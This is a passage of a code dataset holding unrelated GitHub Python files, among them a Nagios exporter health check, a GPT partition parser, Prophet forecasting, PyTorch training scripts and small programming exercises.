[70, 72, 75, 80, 86, 87, 89, 90]\n else:\n compute_versions = [60, 61, 62]\n\n tvm_target_kind = \"cuda\"\n\n @tvm.register_func(\"tvm_callback_cuda_compile\", override=True)\n def tvm_callback_cuda_compile(code, target): # pylint: disable=unused-argument\n \"\"\"use nvcc to generate fatbin code for better optimization\"\"\"\n arch = []\n for compute_version in compute_versions:\n arch += [\"-gencode\", f\"arch=compute_{compute_version},code=sm_{compute_version}\"]\n ptx = nvcc.compile_cuda(code, target_format=\"fatbin\", arch=arch)\n return ptx\n\n logger.info(f\"Using target: {tvm_target}\")\n\n return tvm_target, tvm_target_kind\n","repo_name":"vivym/OmniCC","sub_path":"omni_cc/utils/target_utils.py","file_name":"target_utils.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"19643349962","text":"import argparse\nimport sys\nimport requests\nimport re\n\nSTATE_OK = 0\nSTATE_WARNING = 1\nSTATE_CRITICAL = 2\nSTATE_UNKNOWN = 3\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='Nagios plugin to query prometheus exporter and monitor metrics')\n parser.add_argument(\n '--exporter_api',\n metavar='--exporter_api',\n type=str,\n required=True,\n help='exporter location with scheme and port')\n parser.add_argument('--health_metric', metavar='--health_metric', type=str,\n required=False, default=\"health_status\",\n help='Name of health metric')\n parser.add_argument('--critical', metavar='--critical', type=int,\n required=True,\n help='Value to alert critical')\n parser.add_argument('--warning', metavar='--warning', type=int,\n required=False,\n help='Value to alert warning')\n\n args = parser.parse_args()\n 
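    # query_exporter_metric() below expects Prometheus text-format output and
    # splits each matching line on a single space, so a scraped line such as
    # (illustrative sample only):
    #   health_status{cluster="ceph"} 2
    # becomes metrics['health_status{cluster="ceph"}'] = 2.0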
metrics, error_messages = query_exporter_metric(\n        args.exporter_api, args.health_metric)\n    if error_messages:\n        print(\n            \"Unknown: unable to query metrics. {}\".format(\n                \",\".join(error_messages)))\n        sys.exit(STATE_UNKNOWN)\n\n    criticalMessages = []\n    warningMessages = []\n    for key, value in metrics.items():\n        if value == args.critical:\n            criticalMessages.append(\n                \"Critical: {metric_name} metric is a critical value of {metric_value}({detail})\".format(\n                    metric_name=args.health_metric, metric_value=value, detail=key))\n        elif args.warning and value == args.warning:\n            warningMessages.append(\n                \"Warning: {metric_name} metric is a warning value of {metric_value}({detail})\".format(\n                    metric_name=args.health_metric, metric_value=value, detail=key))\n\n    if criticalMessages:\n        print(\",\".join(criticalMessages))\n        sys.exit(STATE_CRITICAL)\n    elif warningMessages:\n        print(\",\".join(warningMessages))\n        sys.exit(STATE_WARNING)\n    else:\n        print(\"OK: {metric_name} metric has an OK value({detail})\".format(\n            metric_name=args.health_metric, detail=str(metrics)))\n        sys.exit(STATE_OK)\n\n\ndef query_exporter_metric(exporter_api, metric_name):\n    error_messages = []\n    metrics = dict()\n    try:\n        response = requests.get(include_schema(exporter_api), verify=False) # nosec\n        line_item_metrics = re.findall(\n            \"^{}.*\".format(metric_name),\n            response.text,\n            re.MULTILINE)\n        for metric in line_item_metrics:\n            metric_with_labels, value = metric.split(\" \")\n            metrics[metric_with_labels] = float(value)\n    except Exception as e:\n        error_messages.append(\n            \"ERROR retrieving ceph exporter api {}\".format(\n                str(e)))\n\n    return metrics, error_messages\n\n\ndef include_schema(api):\n    if api.startswith(\"http://\") or api.startswith(\"https://\"):\n        return api\n    else:\n        return \"http://{}\".format(api)\n\n\nif __name__ == '__main__':\n    sys.exit(main())\n","repo_name":"att-comdev/nagios","sub_path":"plugins/check_exporter_health_metric.py","file_name":"check_exporter_health_metric.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"}
{"seq_id":"21896378181","text":"#!/bin/python\n\"\"\"\nScript to test the model's predictions\n\nRun:\n```\npython predict.py\n```\n\"\"\"\n\nimport joblib\nimport pandas as pd\n\ndef predict():\n    \"\"\"Example function for making predictions with \n    a trained model\"\"\"\n    clf = joblib.load(\"models/model.pkl\")\n\n    # Read in the data\n    filepath = \"data/interim/model_dev_data.pkl\"\n\n    data_df = pd.read_pickle(filepath)\n    labels = data_df[\"label\"].copy()\n    features = data_df.drop(columns=[\"label\"]).copy()\n\n    print(features.iloc[0:1])\n\n    print(f\"label: {labels.iloc[0]}\")\n    print(f\"prediction: {clf.predict(features.iloc[0:1])[0]}\")\n\nif __name__ == \"__main__\":\n    predict()\n","repo_name":"mbunse/mlcomops","sub_path":"predict_titanic_survival/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"de","doc_type":"code","stars":15,"dataset":"github-code","pt":"6"}
{"seq_id":"29918404830","text":"#Assignment 10, for programming languages\nprint (\"Este programa utilizando la serie:\")\nprint (\"senx=Σ((-1)^n)x^(2n+1)/(2n+1)!\")\nprint (\"obtiene la funcion seno(θ) Donde n es el numero de terminos de la serie que toma y evalua n=4,6,9,10 e imprime esos valores\")\nwhile True:\n    rg=float(input(\"Ingresa el angulo a evaluar en grados: \"))\n    rad=rg*3.141592654/180 #x son los radianes, asi que transformamos los grados en 
radianes\n acum=0 #inicializamos este acumulador, para que funcione como sumatoria\n print (\"Seno(\"+str(rg)+\")=\")\n for i in range(0,11):\n fact=1\n k=2*i+1\n kk=k\n for j in range(1,k): #aqui se utiliza la funcion factorial\n fact=kk*fact\n kk=kk-1\n if fact==0:#si factorial es igual a 0, se convertira en 1\n fact=1\n s=((-1)**i)*(rad**(k))/fact\n acum=acum+s #aqui sumamos la funcion, para aproximar seno\n if i==4: #aqui se imprime el valor buscado, donde i es n\n print (\"En n=4 es: \",acum)\n elif i==6:\n print (\"En n=6 es: \",acum)\n elif i==9:\n print (\"En n=9 es: \",acum)\n elif i==10:\n print (\"En n=10 es: \",acum)\n print(\"¿Desea obtener otra funcion seno? si/no\")\n sn=input()\n while sn[0].lower()!=\"s\" and sn[0].lower()!=\"n\": #comprobamos que ingresaron un valor valido para que continue o termine\n print(\"El valor \"+str(sn)+\" No es valido, ingrese si/no: \")\n sn=input()\n if sn[0].lower()==\"n\": #si es un n, se rompe el ciclo, y termina el programa\n break\nprint (\"***Fin***\")","repo_name":"EdmundoD3/Ejercicios-de-Python","sub_path":"programas python parte 1/T10_Funcion_seno.py","file_name":"T10_Funcion_seno.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5291382202","text":"import PyQt5.QtWidgets as QtW\n\nfrom .player_view import PlayerView\n\n\nclass MainViewStack(QtW.QStackedWidget):\n\n def __init__(\n self,\n player_view: PlayerView,\n # settings_view,\n # plugins_view,\n ):\n super().__init__()\n self.addWidget(player_view)\n self.setCurrentWidget(player_view)\n","repo_name":"pawel-glomski/jerboa","sub_path":"src/jerboa/ui/gui/main_view_stack.py","file_name":"main_view_stack.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"17884415340","text":"from .common import Common\nfrom .vocabulary import ThreatTag as tt\nfrom .vocabulary import ThreatExchange as t\n\n\nclass ThreatTag(Common):\n\n _URL = t.URL + t.VERSION + t.THREAT_TAGS\n _DETAILS = t.URL + t.VERSION\n _RELATED = t.URL + t.VERSION\n\n _fields = [\n tt.ID,\n tt.NAME,\n tt.TAGGED_OBJECTS,\n tt.TEXT,\n tt.TYPE,\n ]\n\n _default_fields = [\n tt.ID,\n tt.NAME,\n tt.TAGGED_OBJECTS,\n tt.TEXT,\n tt.TYPE,\n ]\n\n _unique = [\n ]\n","repo_name":"WeilerWebServices/Facebook","sub_path":"ThreatExchange/api-reference-examples/python/pytx/pytx/threat_tag.py","file_name":"threat_tag.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"37416029206","text":"import gams\nfrom gams import GamsWorkspace\nimport numpy as np\nimport pandas as pd\nimport scipy as sp\nfrom scipy import stats\nfrom collections import defaultdict\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.utils.data as data\nimport torchvision\nfrom torchvision import models, transforms\n\nimport glob\nimport os.path as osp\nimport random\nimport json\nfrom PIL import Image\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport xml.etree.ElementTree as ET\nfrom itertools import product\nfrom math import sqrt\nimport time\nimport dataloader\n\n# 비실행 파일\n# 데이터 모델 구조 정의하기\n# 학습 함수 정의하기\nclass RegressionNet(nn.Module):\n '''데이터 네트워크 만들기'''\n def __init__(self,phase):\n super(RegressionNet,self).__init__()\n self.phase = phase\n self.Linearnet = nn.Sequential(\n nn.Linear(72*6,1024),\n nn.LeakyReLU(),\n 
nn.Linear(1024,128),\n nn.LeakyReLU(),\n nn.Linear(128,16),\n nn.LeakyReLU(),\n nn.Linear(16,2)\n )\n\n def forward(self, x):\n x=x.reshape([-1,72*6])\n x = self.Linearnet(x)\n return x\n\nclass RegressionNetX(nn.Module):\n '''데이터 네트워크 만들기'''\n def __init__(self,X,phase):\n super(RegressionNetX,self).__init__()\n self.phase = phase\n self.X = X\n self.Linearnet = nn.Sequential(\n nn.Linear(self.X,1024),\n nn.LeakyReLU(),\n nn.Linear(1024,128),\n nn.LeakyReLU(),\n nn.Linear(128,16),\n nn.LeakyReLU(),\n nn.Linear(16,2)\n )\n\n def forward(self, x):\n x=x.reshape([-1,self.X])\n x = self.Linearnet(x)\n return x\n\n\nclass DeepNeuralNet(nn.Module):\n '''실패한 듯 좋지 않다.'''\n def __init__(self,phase):\n super(DeepNeuralNet,self).__init__()\n self.phase = phase\n self.Linearnet = nn.Sequential(\n nn.Linear(72*6,1024),\n nn.LeakyReLU(),\n nn.Linear(1024,1024),\n nn.LeakyReLU(),\n nn.Linear(1024, 1024),\n nn.LeakyReLU(),\n nn.Linear(1024, 512),\n nn.LeakyReLU(),\n nn.Linear(512,128),\n nn.LeakyReLU(),\n nn.Linear(128, 16),\n nn.LeakyReLU(),\n nn.Linear(16,2)\n )\n\n def forward(self, x):\n x=x.reshape([-1,72*6])\n x = self.Linearnet(x)\n return x\n\nclass ZeroOrNot(nn.Module):\n '''데이터 네트워크 만들기'''\n def __init__(self,phase):\n super(ZeroOrNot,self).__init__()\n self.phase = phase\n self.Linearnet = nn.Sequential(\n nn.Linear(72*6,1024),\n nn.BatchNorm1d(1024),\n nn.LeakyReLU(),\n nn.Linear(1024,256),\n nn.BatchNorm1d(256),\n nn.LeakyReLU(),\n nn.Linear(256,512),\n nn.BatchNorm1d(512),\n nn.LeakyReLU(),\n nn.Linear(512, 128),\n nn.BatchNorm1d(128),\n nn.LeakyReLU(),\n nn.Linear(128, 32),\n nn.BatchNorm1d(32),\n nn.LeakyReLU(),\n nn.Linear(32, 16),\n nn.LeakyReLU(),\n nn.Linear(16,2),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n x=x.reshape([-1,72*6])\n x = self.Linearnet(x)\n return x\nclass ZeroOrNotX(nn.Module):\n '''데이터 네트워크 만들기'''\n def __init__(self,X,phase):\n super(ZeroOrNotX,self).__init__()\n self.phase = phase\n self.X = X\n self.Linearnet = nn.Sequential(\n nn.Linear(self.X,1024),\n nn.BatchNorm1d(1024),\n nn.LeakyReLU(),\n nn.Linear(1024,256),\n nn.BatchNorm1d(256),\n nn.LeakyReLU(),\n nn.Linear(256,512),\n nn.BatchNorm1d(512),\n nn.LeakyReLU(),\n nn.Linear(512, 128),\n nn.BatchNorm1d(128),\n nn.LeakyReLU(),\n nn.Linear(128, 32),\n nn.BatchNorm1d(32),\n nn.LeakyReLU(),\n nn.Linear(32, 16),\n nn.LeakyReLU(),\n nn.Linear(16,2),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n x=x.reshape([-1,self.X])\n x = self.Linearnet(x)\n return x\n\n\nclass SimpleZeroOrNot(nn.Module):\n '''데이터 네트워크 만들기'''\n def __init__(self,phase):\n super(SimpleZeroOrNot,self).__init__()\n self.phase = phase\n self.Linearnet = nn.Sequential(\n nn.Linear(72*6,512),\n nn.BatchNorm1d(512),\n nn.LeakyReLU(),\n nn.Linear(512,128),\n nn.BatchNorm1d(128),\n nn.LeakyReLU(),\n nn.Linear(128, 32),\n nn.BatchNorm1d(32),\n nn.LeakyReLU(),\n nn.Linear(32,2),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n x=x.reshape([-1,72*6])\n x = self.Linearnet(x)\n return x\n\n\ndef train_model(model,dataloaders_dict, criterion, optimizer, num_epochs):\n device=torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n print(\"사용 장치: \", device)\n\n model.to(device)\n before_best = 100000\n torch.backends.cudnn.benchmark=True\n log_data = defaultdict(list)\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch+1,num_epochs))\n print('-'*30)\n epoch_loss_dict={}\n for phase in dataloaders_dict:\n if phase=='val':\n model.eval()\n else:\n model.train()\n\n epoch_loss=0.0\n epoch_corrects=0\n\n if(epoch==0) and 
(phase.startswith('train')):\n continue\n for inputs, labels in tqdm(dataloaders_dict[phase]):\n inputs=inputs.to(device)\n labels=labels.to(device)\n\n optimizer.zero_grad()\n\n with torch.set_grad_enabled(phase.startswith('train')):\n outputs = model(inputs)\n\n loss=criterion(outputs,labels.to(torch.float32))\n\n if phase.startswith('train'):\n loss.backward()\n optimizer.step()\n epoch_loss +=loss.item()*inputs.size(0)\n\n epoch_loss = epoch_loss/len(dataloaders_dict[phase])\n epoch_loss_dict[phase]=epoch_loss\n for key in epoch_loss_dict:\n print('{} Loss: {:.4f}'.format(key,epoch_loss_dict[key]), end=' ')\n if epoch!=0:\n log_data[key].append(epoch_loss_dict[key])\n if epoch_loss_dict['val']I'),\n ('header_size', 'I'),\n ('crc32', 'I'),\n ('reserved', 'I'),\n ('current_lba', 'Q'),\n ('backup_lba', 'Q'),\n ('first_usable_lba', 'Q'),\n ('last_usable_lba', 'Q'),\n ('disk_guid', '16s'),\n ('part_entry_start_lba', 'Q')\n ]\n\n gpt_partition = [\n ('type', '16s'),\n ('unique', '16s'),\n ('first_lba', 'Q'),\n ('last_lba', 'Q'),\n ('flags', '>Q'),\n ('name', '72s')]\n\n class efi_type(Enum):\n EFI_UNUSED = 0x00000000\n EFI_MBR = 0x024DEE41\n EFI_SYSTEM = 0xC12A7328\n EFI_BIOS_BOOT = 0x21686148\n EFI_IFFS = 0xD3BFE2DE\n EFI_SONY_BOOT = 0xF4019732\n EFI_LENOVO_BOOT = 0xBFBFAFE7\n EFI_MSR = 0xE3C9E316\n EFI_BASIC_DATA = 0xEBD0A0A2\n EFI_LDM_META = 0x5808C8AA\n EFI_LDM = 0xAF9B60A0\n EFI_RECOVERY = 0xDE94BBA4\n EFI_GPFS = 0x37AFFC90\n EFI_STORAGE_SPACES = 0xE75CAF8F\n EFI_HPUX_DATA = 0x75894C1E\n EFI_HPUX_SERVICE = 0xE2A1E728\n EFI_LINUX_DAYA = 0x0FC63DAF\n EFI_LINUX_RAID = 0xA19D880F\n EFI_LINUX_ROOT32 = 0x44479540\n EFI_LINUX_ROOT64 = 0x4F68BCE3\n EFI_LINUX_ROOT_ARM32 = 0x69DAD710\n EFI_LINUX_ROOT_ARM64 = 0xB921B045\n EFI_LINUX_SWAP = 0x0657FD6D\n EFI_LINUX_LVM = 0xE6D6D379\n EFI_LINUX_HOME = 0x933AC7E1\n EFI_LINUX_SRV = 0x3B8F8425\n EFI_LINUX_DM_CRYPT = 0x7FFEC5C9\n EFI_LINUX_LUKS = 0xCA7D7CCB\n EFI_LINUX_RESERVED = 0x8DA63339\n EFI_FREEBSD_BOOT = 0x83BD6B9D\n EFI_FREEBSD_DATA = 0x516E7CB4\n EFI_FREEBSD_SWAP = 0x516E7CB5\n EFI_FREEBSD_UFS = 0x516E7CB6\n EFI_FREEBSD_VINUM = 0x516E7CB8\n EFI_FREEBSD_ZFS = 0x516E7CBA\n EFI_OSX_HFS = 0x48465300\n EFI_OSX_UFS = 0x55465300\n EFI_OSX_ZFS = 0x6A898CC3\n EFI_OSX_RAID = 0x52414944\n EFI_OSX_RAID_OFFLINE = 0x52414944\n EFI_OSX_RECOVERY = 0x426F6F74\n EFI_OSX_LABEL = 0x4C616265\n EFI_OSX_TV_RECOVERY = 0x5265636F\n EFI_OSX_CORE_STORAGE = 0x53746F72\n EFI_SOLARIS_BOOT = 0x6A82CB45\n EFI_SOLARIS_ROOT = 0x6A85CF4D\n EFI_SOLARIS_SWAP = 0x6A87C46F\n EFI_SOLARIS_BACKUP = 0x6A8B642B\n EFI_SOLARIS_USR = 0x6A898CC3\n EFI_SOLARIS_VAR = 0x6A8EF2E9\n EFI_SOLARIS_HOME = 0x6A90BA39\n EFI_SOLARIS_ALTERNATE = 0x6A9283A5\n EFI_SOLARIS_RESERVED1 = 0x6A945A3B\n EFI_SOLARIS_RESERVED2 = 0x6A9630D1\n EFI_SOLARIS_RESERVED3 = 0x6A980767\n EFI_SOLARIS_RESERVED4 = 0x6A96237F\n EFI_SOLARIS_RESERVED5 = 0x6A8D2AC7\n EFI_NETBSD_SWAP = 0x49F48D32\n EFI_NETBSD_FFS = 0x49F48D5A\n EFI_NETBSD_LFS = 0x49F48D82\n EFI_NETBSD_RAID = 0x49F48DAA\n EFI_NETBSD_CONCAT = 0x2DB519C4\n EFI_NETBSD_ENCRYPT = 0x2DB519EC\n EFI_CHROMEOS_KERNEL = 0xFE3A2A5D\n EFI_CHROMEOS_ROOTFS = 0x3CB8E202\n EFI_CHROMEOS_FUTURE = 0x2E0A753D\n EFI_HAIKU = 0x42465331\n EFI_MIDNIGHTBSD_BOOT = 0x85D5E45E\n EFI_MIDNIGHTBSD_DATA = 0x85D5E45A\n EFI_MIDNIGHTBSD_SWAP = 0x85D5E45B\n EFI_MIDNIGHTBSD_UFS = 0x0394EF8B\n EFI_MIDNIGHTBSD_VINUM = 0x85D5E45C\n EFI_MIDNIGHTBSD_ZFS = 0x85D5E45D\n EFI_CEPH_JOURNAL = 0x45B0969E\n EFI_CEPH_ENCRYPT = 0x45B0969E\n EFI_CEPH_OSD = 0x4FBD7E29\n EFI_CEPH_ENCRYPT_OSD = 0x4FBD7E29\n EFI_CEPH_CREATE = 
0x89C57F98\n EFI_CEPH_ENCRYPT_CREATE = 0x89C57F98\n EFI_OPENBSD = 0x824CC7A0\n EFI_QNX = 0xCEF5A9AD\n EFI_PLAN9 = 0xC91818F9\n EFI_VMWARE_VMKCORE = 0x9D275380\n EFI_VMWARE_VMFS = 0xAA31E02A\n EFI_VMWARE_RESERVED = 0x9198EFFC\n\n def __init__(self, num_part_entries=None, part_entry_size=None, part_entry_start_lba=None, *args, **kwargs):\n self.num_part_entries = num_part_entries\n self.part_entry_size = part_entry_size\n self.part_entry_start_lba = part_entry_start_lba\n if num_part_entries is None:\n self.gpt_header += [('num_part_entries', 'I'),]\n if part_entry_size is None:\n self.gpt_header += [('part_entry_size', 'I'),]\n\n\n def parse(self, gptdata, sectorsize=512):\n self.header = read_object(gptdata[sectorsize:sectorsize+0x5C], self.gpt_header)\n self.sectorsize=sectorsize\n if self.header[\"signature\"]!=b\"EFI PART\":\n print(\"Invalid or unknown GPT magic.\")\n return False\n if self.header[\"revision\"]!=0x100:\n print(\"Unknown GPT revision.\")\n return False\n if self.part_entry_start_lba is not None:\n start = self.part_entry_start_lba\n else:\n start=self.header[\"part_entry_start_lba\"]*sectorsize\n if \"part_entry_size\" in self.header:\n entrysize=self.header[\"part_entry_size\"]\n else:\n entrysize=self.part_entry_size\n self.partentries=[]\n\n class partf:\n unique=b\"\"\n first_lba=0\n last_lba=0\n flags=0\n type=b\"\"\n name=b\"\"\n\n if \"num_part_entries\" in self.header:\n num_part_entries=self.header[\"num_part_entries\"]\n else:\n num_part_entries=self.num_part_entries\n \n for idx in range(0,num_part_entries):\n data=gptdata[start+(idx*entrysize):start+(idx*entrysize)+entrysize]\n partentry=read_object(data,self.gpt_partition)\n pa=partf()\n guid1=struct.unpack(\" int:\n # Check if the grid is empty or the top-left cell is an obstacle\n if not obstacleGrid or not obstacleGrid[0] or obstacleGrid[0][0] == 1:\n return 0\n\n # Get the dimensions of the grid\n m, n = len(obstacleGrid), len(obstacleGrid[0])\n\n # Initialize two arrays to store the number of unique paths for each cell in the current and previous rows\n previous = [0] * n\n current = [0] * n\n previous[0] = 1 # There is one way to reach the top-left cell\n\n # Iterate through each row\n for i in range(m):\n # Calculate the number of unique paths for the first cell in the current row\n current[0] = 0 if obstacleGrid[i][0] == 1 else previous[0]\n\n # Iterate through each column starting from the second cell\n for j in range(1, n):\n # Calculate the number of unique paths for the current cell based on the obstacles\n current[j] = (\n 0 if obstacleGrid[i][j] == 1 else current[j - 1] + previous[j]\n )\n\n # Update the 'previous' array with the values of the 'current' array for the next iteration\n previous[:] = current\n\n # The result is the number of unique paths for the bottom-right cell\n return previous[n - 1]\n","repo_name":"Amit258012/100daysofcode","sub_path":"Day80/unique_paths_2.py","file_name":"unique_paths_2.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27589225247","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 19 11:49:17 2019\r\n\r\n@author: dbt\r\n\"\"\"\r\n# Python\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom fbprophet import Prophet\r\nimport sys\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nfrom fbprophet.plot import add_changepoints_to_plot\r\n\r\n#orig_out = sys.stdout\r\n#sys.stdout = open(os.devnull, 'w')\r\n \r\n\r\n#filename = sys.argv[1] 
#从cmd读取数据\r\nfilename='data'#从指定文件读取数据\r\n\r\n\r\ndf = pd.read_csv(filename+'.txt')\r\n#df['y'] = np.log(df['y']) #为什么要log处理?都要有吗?\r\n\r\n#df['cap'] = 1#log预测才用\r\n#df['floor'] = -1#log预测才用\r\n\r\ndf.head()\r\n\r\n\r\n#设置跟随性: changepoint_prior_scale=0.05 值越大,拟合的跟随性越好,可能会过拟合\r\n#设置置信区间:interval_width=0.8(默认值),值越小,上下线的带宽越小。\r\n#指定预测类型: growth='linear'或growth = \"logistic\" ,默认应该是linear。\r\n#马尔科夫蒙特卡洛取样(MCMC): mcmc_samples=0,会计算很慢。距离意义不清楚\r\n#设置寻找突变点的比例:changepoint_range=0.9 默认从数据的前90%中寻找异常数据。预测这个正弦曲线,如果不设置changepoint_range=1,预测的结果是不对的,不知道为什么。\r\n\r\nm = Prophet(changepoint_prior_scale=0.9,interval_width=0.9,growth='linear',changepoint_range=1) \r\nm.fit(df);\r\n\r\n#periods 周期,一般是根据实际意义确定,重点:后续预测的长度是一个周期的长度。\r\n#freq 我见的有‘MS‘、H、M ,预测sin,要设置H ,个人理解数据如果变化很快,要用H\r\nfuture = m.make_future_dataframe(periods=120, freq='H') #freq=‘MS‘或者H 来设置\r\n\r\nfuture['cap'] = 1 #log预测才用?linear也可以加上。\r\nfuture['floor'] = -1#log预测才用?linear也可以加上。\r\n\r\n#画图\r\nfuture.tail()\r\n\r\nforecast = m.predict(future)\r\nforecast.tail()\r\nfig=m.plot(forecast)\r\nplt.savefig('./out/'+filename+'_1.jpg',dpi=500)\r\nm.plot_components(forecast)\r\nplt.savefig('./out/'+filename+'_2.jpg',dpi=500)\r\n#print(forecast[['ds', 'yhat', 'yhat_lower', 'yhat_upper']]) #打印到console\r\n \r\n\r\nsavename='./out/'+filename+\"_out.txt\"\r\n \r\n \r\n#forecast.to_csv(savename, sep='\\t',index=False) #保留panda.dataframe 的全部列数据\r\n\r\nforecast[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].to_csv(savename, sep='\\t',index=False) #保留panda.dataframe 的指定列的数据\r\n\r\nx = forecast['ds']\r\ny = forecast['yhat']\r\ny1 = forecast['yhat_lower']\r\ny2 = forecast['yhat_upper']\r\nplt.plot(x,y)\r\nplt.savefig('./out/'+filename+'_3.jpg',dpi=500)\r\nplt.plot(x,y1)\r\nplt.savefig('./out/'+filename+'_4.jpg',dpi=500)\r\nplt.plot(x,y2)\r\nplt.savefig('./out/'+filename+'_5.jpg',dpi=500)\r\n#plt.show()\r\n\r\n#把检测到的突变点,用红色线表示在图上。\r\na = add_changepoints_to_plot(fig.gca(), m, forecast)\r\n\r\n","repo_name":"DamonDBT/prophet_sin_demo","sub_path":"demo/prophet.py","file_name":"prophet.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"8968601400","text":"print('''\nO que você deseja?\n[ 1 ] Adicionar uma quantidade especifica de valores na lista\n[ 2 ] Adicionar um valor indertemidado de valores na lista\n[ 3 ] Fechar o programa\n''')\n\nescolha = int(input('Sua escolha : '))\nlista = []\nlistaOrganizada = []\ncontador = 0\nmenor = -1\n\n # SISTEMA QUE RECEBE OS VALORES E ADICIONA A LISTA\nwhile True:\n if escolha == 1:\n quantidade = int(input('Quantos valores deseja adicionar : '))\n\n for i in range(quantidade):\n valor = int(input('Digite o {}° valor desejado : '.format(i + 1)))\n lista.append(valor)\n break\n\n elif escolha == 2:\n print('ATENÇÃO : O programa irá fechar quando você digitar o numero 0')\n\n while True:\n contador += 1\n valor = int(input('Digite o {}° valor desejado : '.format(contador)))\n lista.append(valor)\n\n if valor == 0:\n break\n break\n\n elif escolha == 3:\n print('ENCERRANDO . . 
.')\n break\n\n else:\n print('Escolha inválida, por favor, digite novamente!')\n escolha = int(input('Sua escolha : '))\n\nprint('Sua lista digitada ficou assim :')\nfor c in range(len(lista)):\n print('{} '.format(lista[c]), end = '')\n\nc = 0\nlista.sort()\n\nprint('\\nA lista foi organizada e ficou assim : ')\n\nfor c in range(len(lista)):\n print('{} -> '.format(lista[c]), end = '')\n\nprint('FIM')\n\n\n # PRIMEIRA TENTATIVA \n# for c in range(len(lista)):\n# numero = lista[c]\n# \n# if numero == menor:\n# nuemro = lista[c]\n# \n# else:\n# for a in range(len(lista)):\n# if numero >= lista[a]:\n# menor = lista[a]\n# else:\n# maior = lista[a]\n# \n# if c == len(lista):\n# listaOrganizada.append(maior)\n# \n# listaOrganizada.append(numero)\n# print(menor)\n\n\n # SEGUNDA TENTATIVA\n# for c in range(len(lista)):\n# menor = lista[c]\n# \n# for a in range(c + 1, len(lista)):\n# if menor >= lista[a]:\n# menor = lista[a]\n# \n# c, menor = menor, c","repo_name":"FabricioJonatan/Estudo-de-Python","sub_path":"Programas feitos no IF/DesafioListas.py","file_name":"DesafioListas.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70929851388","text":"import torch\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nfrom torch import nn\nimport torch.optim as optim\nimport time\n\n# 数据集路径\ndataset_dir = \"dataset/Caltech256\"\n\n# 预处理\ntrain_transforms = transforms.Compose([\n transforms.Resize((224, 224)), # 调整图片大小至224x224像素\n transforms.RandomHorizontalFlip(), # 随机水平翻转图片,增加数据集的多样性。\n transforms.ToTensor(), # 将图片转换为 PyTorch 中的张量(tensor)类型,以便能够输入到神经网络中进行训练。\n # 对图片进行标准化处理,使得每个像素的数值都集中在 0 周围,并具有相同的方差。这个过程可以提高模型的训练效果和准确性。\n transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))\n])\n# test_transforms = transforms.Compose([\n# transforms.Resize((224, 224)),\n# transforms.ToTensor(),\n# transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))\n# ])\n\n# 加载数据集\ntrain_data = datasets.ImageFolder(root=dataset_dir + '/256_ObjectCategories', transform=train_transforms)\n# test_data = datasets.ImageFolder(root=dataset_dir + '/test', transform=test_transforms)\n\ntrain_loader = torch.utils.data.DataLoader(train_data, batch_size=64, shuffle=True)\n# test_loader = torch.utils.data.DataLoader(test_data, batch_size=32)\n\ntrain_num = len(train_data)\n# test_num = len(test_data)\nprint(\"训练数据集数量:{}\".format(train_num))\n# print(\"验证数据集数量:{}\".format(test_num))\n\n# 加载训练设备\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nif device.type == 'cuda':\n print('使用GPU训练')\nelse:\n print('使用CPU训练')\n\n# 加载模型\nmodel = torch.load(\"vgg16_caltech256.pth\")\nmodel.to(device)\n\n# 定义损失函数和优化器\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.Adam(model.parameters(), lr=0.001)\ncriterion.to(device)\n\n# 设置训练网络的参数\nepoch = 10 # 训练轮数\n\nstart_time = time.time() # 开始时间\ntemp_time = start_time\n\n# 开始训练\nfor i in range(epoch):\n print(\"--------------第{}轮训练开始:---------------\".format(i + 21))\n # 将模型设置为训练模式\n model.train()\n # 初始化训练损失和正确率\n train_loss = 0.0\n train_acc = 0.0\n for data in train_loader:\n images, targets = data\n images = images.to(device)\n targets = targets.to(device)\n # 梯度清零\n optimizer.zero_grad()\n # 前向传播,计算损失\n outputs = model(images) # 将数据放到网络中训练\n loss = criterion(outputs, targets) # 用损失函数得到差异值\n # 优化模型,反向传播,更新模型参数\n loss.backward()\n optimizer.step()\n # 统计训练损失和正确率\n train_loss += loss.item() * images.size(0)\n preds = 
